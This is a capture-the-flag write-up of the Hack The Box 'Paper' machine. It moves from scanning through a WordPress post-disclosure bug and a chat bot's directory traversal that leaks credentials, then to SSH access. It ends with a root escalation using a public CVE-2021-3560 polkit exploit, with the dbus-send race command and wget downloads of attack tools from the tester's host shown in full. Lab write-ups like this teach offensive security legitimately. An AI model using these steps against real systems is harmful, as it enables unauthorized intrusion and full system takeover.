Previous Page
Paper Writeup
Introduction :
Paper is an easy box released back in Febuary 2022
Paper is an easy box released back in Febuary 2022
As always we begin our Enumeration using Nmap to enumerate opened ports. We will be using the flags -sC for default scripts and -sV to enumerate versions.
[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
→ sudo vim /etc/hosts
[sudo] password for nothing:
[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
→ ping paper.htb
PING paper.htb (10.129.136.31) 56(84) bytes of data.
64 bytes from paper.htb (10.129.136.31): icmp_seq=1 ttl=63 time=24.9 ms
^C
--- paper.htb ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 24.883/24.883/24.883/0.000 ms
[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
→ nmap -sCV paper.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-30 20:21 CEST
Nmap scan report for paper.htb (10.129.136.31)
Host is up (0.028s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
| 256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_ 256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-title: HTTP Server Test Page powered by CentOS
| http-methods:
|_ Potentially risky methods: TRACE
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-title: HTTP Server Test Page powered by CentOS
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods:
|_ Potentially risky methods: TRACE
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after: 2022-07-08T10:32:34
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.78 seconds
Our nmap scan picked up port 80 running apache 2.4.37 which is most likely running CentOS. When we curl port 80 we see it displays another domain:
[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
→ curl -v http://paper.htb
* Trying 10.129.136.31:80...
* Connected to paper.htb (10.129.136.31) port 80 (#0)
GET / HTTP/1.1
Host: paper.htb
User-Agent: curl/7.84.0
Accept: */*
Mark bundle as not supporting multiuse
HTTP/1.1 403 Forbidden
Date: Tue, 30 Aug 2022 18:31:07 GMT
Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
X-Backend-Server: office.paper
Last-Modified: Sun, 27 Jun 2021 23:47:13 GMT
ETag: "30c0b-5c5c7fdeec240"
Accept-Ranges: bytes
Content-Length: 199691
Content-Type: text/html; charset=UTF-8
So we add the domain office.paper to our /etc/hosts file:
[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
→ sudo vim /etc/hosts
[sudo] password for nothing:
[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
→ cat /etc/hosts | grep paper
10.129.136.31 paper.htb office.paper
[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
→ ping office.paper
PING paper.htb (10.129.136.31) 56(84) bytes of data.
64 bytes from paper.htb (10.129.136.31): icmp_seq=1 ttl=63 time=23.2 ms
64 bytes from paper.htb (10.129.136.31): icmp_seq=2 ttl=63 time=23.0 ms
let's enumerate for other subdomains using wfuzz (we specify the wordlist we want to use and we hide 403 code responses):
[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
→ wfuzz -u http://office.paper -H "Host: FUZZ.office.paper" -w /bedrock/strata/kali/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hc 403
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://office.paper/
Total requests: 4989
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000070: 200 507 L 13015 W 223163 Ch "chat"
^C /usr/lib/python3.10/site-packages/wfuzz/wfuzz.py:79: UserWarning:Finishing pending requests...
Total time: 5.887163
Processed Requests: 192
Filtered Requests: 191
Requests/sec.: 32.61332
wfuzz found the chat.office.paper subdomain so let's also add it to our /etc/hosts file, then we browse it:
And here we find a rocketchat instance. Let's go back to it after we get credentials. We move on back to the http site with the TLD office.paper:
browsing to http://office.paper/wp-admin reveals that it is a wordpress site. So we run wpscan:
[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
→ wpscan --url http://office.paper
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://office.paper/ [10.129.136.31]
[+] Started: Tue Aug 30 20:47:20 2022
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
| - X-Powered-By: PHP/7.2.24
| - X-Backend-Server: office.paper
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] WordPress readme found: http://office.paper/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] WordPress version 5.2.3 identified (Insecure, released on 2019-09-05).
| Found By: Rss Generator (Passive Detection)
| - http://office.paper/index.php/feed/, generator>https://wordpress.org/?v=5.2.3/generator>
| - http://office.paper/index.php/comments/feed/, generator>https://wordpress.org/?v=5.2.3/generator>
[+] WordPress theme in use: construction-techup
| Location: http://office.paper/wp-content/themes/construction-techup/
| Last Updated: 2021-07-17T00:00:00.000Z
| Readme: http://office.paper/wp-content/themes/construction-techup/readme.txt
| [!] The version is out of date, the latest version is 1.4
| Style URL: http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1
| Style Name: Construction Techup
| Description: Construction Techup is child theme of Techup a Free WordPress Theme useful for Business, corporate a...
| Author: wptexture
| Author URI: https://testerwp.com/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1, Match: 'Version: 1.1'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <=================================================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue Aug 30 20:47:25 2022
[+] Requests Done: 185
[+] Cached Requests: 5
[+] Data Sent: 44.421 KB
[+] Data Received: 18.75 MB
[+] Memory used: 227.438 MB
[+] Elapsed time: 00:00:04
So here this wordpress instance is vulnerable to CVE-2019-17671, which is basically a mistake which allows us to view published posts with the following PHP variable: ?static=1 which allows us to see all the other posts:
here a secret post reveals to us the secret registering link, so let's use it to create an account:
once we log in, we can see the following info:
Basically there's a bot called recyclops and we can reach it via DM to type commands:
We can list files with the command "list"
And with directory traversal we see that there is a user on the box called "dwight".
Going just one directory up we see the directory hubot containing a .env file with plaintext credentials: recyclops/Queenofblad3s!23, so let's check for password reuse with the user dwight:
[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
→ crackmapexec ssh office.paper -u dwight -p 'Queenofblad3s!23'
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing SMB protocol database
[*] Initializing LDAP protocol database
[*] Initializing SSH protocol database
[*] Initializing MSSQL protocol database
[*] Initializing WINRM protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
/usr/lib/python3/dist-packages/pywerview/requester.py:144: SyntaxWarning: "is not" with a literal. Did you mean "!="?
if result['type'] is not 'searchResEntry':
SSH paper.htb 22 office.paper [*] SSH-2.0-OpenSSH_8.0
SSH paper.htb 22 office.paper [+] dwight:Queenofblad3s!23
[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
→ ssh dwight@office.paper
The authenticity of host 'office.paper (10.129.136.31)' can't be established.
ED25519 key fingerprint is SHA256:9utZz963ewD/13oc9IYzRXf6sUEX4xOe/iUaMPTFInQ.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'office.paper' (ED25519) to the list of known hosts.
dwight@office.paper's password:
Activate the web console with: systemctl enable --now cockpit.socket
Last login: Tue Feb 1 09:14:33 2022 from 10.10.14.23
[dwight@paper ~]$ id
uid=1004(dwight) gid=1004(dwight) groups=1004(dwight)
[dwight@paper ~]$ cat user.txt
a0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And we managed to log in and get the user flag!
Now in order to privesc let's enumerate the possible privesc paths using linpeas.sh:
[term1]
[dwight@paper ~]$ which wget curl
/usr/bin/wget
/usr/bin/curl
[term2]
[ 10.10.14.13/23 ] [ nowhere ] [~/HTB/Paper]
→ wget https://github.com/carlospolop/PEASS-ng/releases/download/20220828/linpeas.sh
--2022-08-30 21:12:52-- https://github.com/carlospolop/PEASS-ng/releases/download/20220828/linpeas.sh
Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
Resolving github.com (github.com)... 140.82.121.3
Connecting to github.com (github.com)|140.82.121.3|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/14f0a504-adb0-4d42-918e-9a222fa1ba90?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20220830%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220830T191251Z&X-Amz-Expires=300&X-Amz-Signature=9743821c11a0ac568713ac91163de2aee6d92a3462a4cfe931bf777ecbafbc1e&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=165548191&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream [following]
--2022-08-30 21:12:53-- https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/14f0a504-adb0-4d42-918e-9a222fa1ba90?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20220830%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220830T191251Z&X-Amz-Expires=300&X-Amz-Signature=9743821c11a0ac568713ac91163de2aee6d92a3462a4cfe931bf777ecbafbc1e&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=165548191&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream
Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.111.133, 185.199.108.133, 185.199.110.133, ...
Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 807205 (788K) [application/octet-stream]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[=======================================================================================================================================================>] 788.29K 4.40MB/s in 0.2s
2022-08-30 21:12:53 (4.40 MB/s) - ‘linpeas.sh’ saved [807205/807205]
[ 10.10.14.13/23 ] [ nowhere ] [~/HTB/Paper]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
[term1]
[dwight@paper ~]$ wget 10.10.14.13:9090/linpeas.sh
--2022-08-30 15:13:45-- http://10.10.14.13:9090/linpeas.sh
Connecting to 10.10.14.13:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 807205 (788K) [application/x-sh]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[=======================================================================================================================================================>] 788.29K 2.00MB/s in 0.4s
2022-08-30 15:13:46 (2.00 MB/s) - ‘linpeas.sh’ saved [807205/807205]
[dwight@paper ~]$ chmod +x linpeas.sh
[dwight@paper ~]$ ./linpeas.sh
Here we see that there should be a buffer overflow vulnerability with the sudo binary, vulnerability nicknamed "Baron Samedit". To check if it is vulnerable we need to run sudoedit -s / and if it returns sudoedit /: not a regular file then it is vulnerable:
[dwight@paper ~]$ sudoedit -s /
usage: sudoedit [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file ...
It's not, however linpeas.sh also picked up that the VM is vulnerable to CVE-2021-3560, so let's exploit it as follows:
[term1]
[ 10.10.14.13/23 ] [ nowhere ] [~/HTB/Paper]
→ wget https://raw.githubusercontent.com/curtishoughton/CVE-2021-3560/master/CVE-2021-3560.py
--2022-08-30 21:29:20-- https://raw.githubusercontent.com/curtishoughton/CVE-2021-3560/master/CVE-2021-3560.py
Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.111.133, 185.199.109.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2803 (2.7K) [text/plain]
Saving to: ‘CVE-2021-3560.py’
CVE-2021-3560.py 100%[=======================================================================================================================================================>] 2.74K --.-KB/s in 0.001s
2022-08-30 21:29:20 (4.58 MB/s) - ‘CVE-2021-3560.py’ saved [2803/2803]
[ 10.10.14.13/23 ] [ nowhere ] [~/HTB/Paper]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
10.129.136.31 - - [30/Aug/2022 21:29:45] "GET /CVE-2021-3560.py HTTP/1.1" 200 -
[term2]
[dwight@paper ~]$ wget http://10.10.14.13:9090/CVE-2021-3560.py
--2022-08-30 15:29:44-- http://10.10.14.13:9090/CVE-2021-3560.py
Connecting to 10.10.14.13:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2803 (2.7K) [text/x-python]
Saving to: ‘CVE-2021-3560.py’
CVE-2021-3560.py 100%[=======================================================================================================================================================>] 2.74K --.-KB/s in 0s
2022-08-30 15:29:44 (123 MB/s) - ‘CVE-2021-3560.py’ saved [2803/2803]
[dwight@paper ~]$ which python python3
/usr/bin/which: no python in (/home/dwight/.local/bin:/home/dwight/bin:/usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin)
/usr/bin/python3
[dwight@paper ~]$ python3 CVE-2021-3560.py
##############CVE-2021-3560##############
# __________ .__ __ .__ __ #
# \______ \____ | | | | _|__|/ |_ #
# | ___/ _ \| | | |/ / \ __\ #
# | | ( <_> ) |_| | || | #
# |____| \____/|____/__|_ \__||__| #
# \/ #
# Local Privilege Escalation Exploit #
# Author: Salman Asad (@deathflash1411) #
#########################################
[+] User created!
[+] Username: flash
[+] User ID: 1005
[!] Run the below command a few times (<10) and login via su - flash
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1005 org.freedesktop.Accounts.User.SetPassword string:'$5$HPVUSULZZ8BMl4wE$zisRakxfq9IDf7mY0FUteDiKtYYRjmGkf3RAUjFE2P2' string:GoldenEye & sleep 0.005s ; kill $!
[dwight@paper ~]$
So let's follow the script's instructions:
[dwight@paper ~]$ python3 CVE-2021-3560.py
##############CVE-2021-3560##############
[+] User created!
[+] Username: flash
[+] User ID: 1005
[!] Run the below command a few times (<10) and login via su - flash
[dwight@paper ~]$ dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1005 org.freedesktop.Accounts.User.SetPassword string:'$5$HPVUSULZZ8BMl4wE$zisRakxfq9IDf7mY0FUteDiKtYYRjmGkf3RAUjFE2P2' string:GoldenEye
[dwight@paper ~]$ su - flash
Password:
[flash@paper ~]$ id
uid=1005(flash) gid=1005(flash) groups=1005(flash),10(wheel)
[flash@paper ~]$ sudo su
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for flash:
[root@paper flash]# id
uid=0(root) gid=0(root) groups=0(root)
[root@paper flash]# cat /root/root.txt
2fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We managed to get the root flag!
Here we can see the progress graph :
